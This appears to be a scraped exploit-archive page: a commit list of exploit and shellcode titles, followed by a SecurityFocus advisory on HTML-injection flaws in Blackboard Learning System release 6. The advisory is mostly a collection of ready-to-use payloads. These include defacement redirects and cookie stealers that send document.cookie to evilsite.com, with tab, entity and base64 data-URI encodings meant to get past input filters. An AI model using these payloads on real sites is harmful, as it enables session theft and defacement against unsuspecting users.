880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
94 lines
No EOL
3.3 KiB
Text
94 lines
No EOL
3.3 KiB
Text
source: https://www.securityfocus.com/bid/19308/info
|
|
|
|
Blackboard products are prone to multiple HTML-injection vulnerabilities because the software fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
|
|
|
Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
|
|
|
|
Blackboard Learning System (Release 6) and Blackboard Learning and Community Portal Suite (Release 6 build 6.2.3.23) are vulnerable; other version may also be affected.
|
|
|
|
Reports indicate this issue has been addressed in versions 7.0 and 7.1, but Symantec has not confirmed this.
|
|
|
|
UPDATE (June 14, 2007): Reports indicate that Blackboard Academic Suite - Vista 4 is also vulnerable.
|
|
|
|
Defacement (FrameBuster)
|
|
-------------------------
|
|
<meta http-equiv="refresh"
|
|
content="15;url= http://evilsite.com">
|
|
|
|
|
|
Defacement (FrameBuster)
|
|
-------------------------
|
|
<iframe src=" http://evilsite.com" width=100
|
|
height=100></iframe>
|
|
|
|
|
|
Defacement (IE ONLY)
|
|
-------------------------
|
|
<img src=vbscript:document.write("defaced_by_insane_script_kiddies")>
|
|
|
|
|
|
Defacement (IE ONLY)
|
|
-------------------------
|
|
<link rel="stylesheet"
|
|
href=vbscript:document.write("defaced_by_insane_script_kiddies")>
|
|
|
|
|
|
Cookie Stealer (IE ONLY)
|
|
-------------------------
|
|
|
|
<img
|
|
src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/>
|
|
<img src="vbscript:window.focus ()"style=visibility:hidden/>
|
|
<img src="vbscript: window.close()"style=visibility:hidden/>
|
|
|
|
|
|
Cookie Stealer (IE ONLY)
|
|
-------------------------
|
|
<link rel="stylesheet"
|
|
href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">
|
|
|
|
|
|
Cookie Stealer (Encoded Tab - IE ONLY)
|
|
-------------------------
|
|
<img
|
|
src="jav	ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav
|
|
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
|
|
|
|
|
|
Cookie Stealer (html encoded - IE ONLY)
|
|
-------------------------
|
|
<img
|
|
src='javascripdocument.images[1].s
|
|
rc=" http://evilsite.com"+document.cookie;'<img
|
|
src="jav
|
|
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
|
|
|
|
|
|
Cookie Stealer (tabs - IE ONLY)
|
|
-------------------------
|
|
<img src="jav
|
|
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
|
|
|
|
|
|
Cookie Stealer (body tag with tabs - IE ONLY)
|
|
-------------------------
|
|
<body background="jav
|
|
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">
|
|
|
|
|
|
Cookie Stealer (div tag with tabs - IE ONLY)
|
|
-------------------------
|
|
<div style="background-image: url(jav
|
|
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)">
|
|
|
|
|
|
Cookie Stealer (firefox)
|
|
-------------------------
|
|
<META HTTP-EQUIV="refresh"
|
|
CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">
|
|
|
|
|
|
Cookie Stealer (firefox - click to work)
|
|
-------------------------
|
|
<a
|
|
href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a> |